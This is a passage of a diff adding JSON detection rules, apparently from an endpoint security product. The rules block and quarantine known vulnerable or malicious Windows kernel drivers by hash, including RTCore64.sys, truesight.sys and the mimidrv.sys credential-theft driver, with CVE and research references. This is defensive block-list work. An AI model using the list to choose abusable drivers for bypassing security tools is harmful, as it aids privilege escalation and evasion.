+ "hl_testing_start_time": "2026-03-23T11:45:29.614496Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "38fa0c663c8689048726666f1c5e019feaa9da8278f1df6ff62da33961891d2a",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eb710708-e0bc-5b8f-8699-2efb84b86cef",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.821559Z",
+ "creation_date": "2026-03-23T11:45:31.821562Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.821571Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9b4ec8dfdc14be119b69341a52de33772cbc2efb1078dbdeacdcd35c86356d3d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eb7efdc6-cd7b-526b-8f95-128064b997a8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827716Z",
+ "creation_date": "2026-03-23T11:45:30.827718Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827724Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c67fd4bf9578eb529dd8c4fe6681e1b4a6f5376036aada2e4db6a57db5246ea0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eb80ffef-805b-58d3-a664-e37e62efe32f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.476585Z",
+ "creation_date": "2026-03-23T11:45:30.476589Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.476598Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "83e993691aa4f5f599dddd1fab2bc3e0791587c9e93eeb9e405c130922096343",
+ "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eb8116ff-b09d-5c0a-b51c-ada5dc6b8bc2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606280Z",
+ "creation_date": "2026-03-23T11:45:29.606284Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.606292Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c7fef94e329bd9b66b281539265f989313356cbd9c345df9e670e9c4b6e0edce",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eb8526a5-96ba-527f-a07c-7a15ee8a3e8f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832816Z",
+ "creation_date": "2026-03-23T11:45:30.832818Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832824Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fc49b67101f8ee7db2604bdb42d9c265076e60bd8c73b5d510c4b61f227d7ab5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eba34f89-2e14-5e7b-a005-04b4439f7638",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.818923Z",
+ "creation_date": "2026-03-23T11:45:30.818925Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818931Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8c20d10857c37d8ed9151fa95f6bf12f99ef2c0bea36eed2370a1f4da7737951",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ebb05a35-351d-52a1-a7ba-3cf41f860896",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.468139Z",
+ "creation_date": "2026-03-23T11:45:30.468143Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.468151Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8bec85d128eb0444f10fc89b95b2c6b84a8d0405cb0a6dbc30cff8ea4c0ca043",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ebb3d61c-1806-52db-9594-167f493594a9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.485353Z",
+ "creation_date": "2026-03-23T11:45:31.485356Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.485366Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "492ae424ec172ebea9d26f0f67a479084d5cef2d9390474003d49941f8a2abe7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ebde7747-3a7f-5ecd-b680-5dfcd6287cf8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.490661Z",
+ "creation_date": "2026-03-23T11:45:31.490663Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.490668Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "17e831c003dc45f8b63438c8aebf5805cceed30704c1306223964be1e3af7157",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ebff7451-45ef-564d-96e1-7e560c8206cb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.807767Z",
+ "creation_date": "2026-03-23T11:45:31.807770Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.807779Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1d54ebc14e22dbcda953e2db38cf37e207bd8bfbc24e1ef8ddc0f107cc04d9a0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ec0c6d51-b0c9-535b-8c3e-5ef550219775",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.490173Z",
+ "creation_date": "2026-03-23T11:45:31.490175Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.490180Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3df162270502add907987cf0deaf5faaa4080956e61de6ecb2fd4d58104ab9d3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ec0e5980-d803-560f-9ab7-5b55d17d5a97",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.824240Z",
+ "creation_date": "2026-03-23T11:45:30.824242Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.824248Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d8e629a867377e1f49a9827caf036e9e2938d3a85e6e05f9d17a7e9236df2043",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ec0fe2e2-85a1-5e70-90af-f990eefab756",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.473574Z",
+ "creation_date": "2026-03-23T11:45:31.473578Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.473588Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0d95fd391154cc4ff120ba41ab38120de99f5675d47919103bfc0f7647f872c8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ec17f731-75b0-54e8-bbbc-a193bfab9b3b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.495725Z",
+ "creation_date": "2026-03-23T11:45:31.495727Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.495733Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ac7835fc414e41ce60a7bdda8f7056a6502f878c19aef5f315b164348e3bb9d0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ec18bce5-2f88-59a2-9065-03e721305abe",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.461583Z",
+ "creation_date": "2026-03-23T11:45:30.461586Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.461595Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9a67626fb468d3f114c23ac73fd8057f43d06393d3eca04da1d6676f89da2d40",
+ "comment": "Malicious Kernel Driver (aka 5a4fe297c7d42539303137b6d75b150d.sys) [https://www.loldrivers.io/drivers/75b9b0c5-dd3e-4cf3-a693-c80f2feabb6a/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ec1f5ac6-5f0f-54bd-b6f3-f1129a019eb1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.616238Z",
+ "creation_date": "2026-03-23T11:45:29.616240Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.616246Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "88df37ede18bea511f1782c1a6c4915690b29591cf2c1bf5f52201fbbb4fa2b9",
+ "comment": "Huawei vulnerable BIOS update tool (aka Phymemx64.sys) [https://www.loldrivers.io/drivers/268e87ba-ad44-4f3c-986f-26712cac68da/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ec258a4f-4d8f-5368-acc1-b3aab8578783",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607595Z",
+ "creation_date": "2026-03-23T11:45:29.607597Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607603Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4b4c925c3b8285aeeab9b954e8b2a0773b4d2d0e18d07d4a9d268f4be90f6cae",
+ "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ec283ada-4417-50a0-9258-38c9cb6ae43e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.833065Z",
+ "creation_date": "2026-03-23T11:45:30.833068Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.833077Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a25c80390c61f13ac79d1ecaf3768450c87e25e6cfc624a3124cce975d6a9212",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ec3774db-a203-59b3-9940-d28015426670",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.498200Z",
+ "creation_date": "2026-03-23T11:45:31.498204Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.498212Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cbf711e482cd15e4dd7c15317843831c32114b9690df0cba7df4ab0ed2903128",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ec3a654e-3d37-5f88-a402-8884ca748e60",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.464654Z",
+ "creation_date": "2026-03-23T11:45:30.464657Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.464666Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4dc24fd07f8fb854e685bc540359c59f177de5b91231cc44d6231e33c9e932b1",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ec41d9db-66a8-5ca8-a83a-21804f0b0caf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.977189Z",
+ "creation_date": "2026-03-23T11:45:29.977191Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.977197Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "72b36c64f0b349d7816c8e5e2d1a7f59807de0c87d3f071a04dbc56bec9c00db",
+ "comment": "ASUS vulnerable VGA Kernel Mode Driver (aka EIO.sys) [https://www.loldrivers.io/drivers/f654ad84-c61d-477c-a0b2-d153b927dfcc/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ec476f7e-bc37-5683-8baa-6ab34ee94050",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617867Z",
+ "creation_date": "2026-03-23T11:45:29.617880Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617886Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0e9072759433abf3304667b332354e0c635964ff930de034294bf13d40da2a6f",
